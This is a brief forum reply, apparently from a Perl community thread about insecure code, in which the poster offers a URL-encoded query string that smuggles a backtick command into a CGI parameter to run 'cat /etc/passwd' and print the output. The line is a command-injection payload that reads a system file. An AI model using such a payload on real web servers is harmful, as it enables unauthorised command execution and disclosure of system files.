in reply to Can we top this security problem?

Hmmm. Not much time to be really diabolical, but how about something like...
http://server.domain/index.cgi?Blah=%60cat%20/etc/passwd%60;%20print%2 +0$Blah

Russ
Brainbench 'Most Valuable Professional' for Perl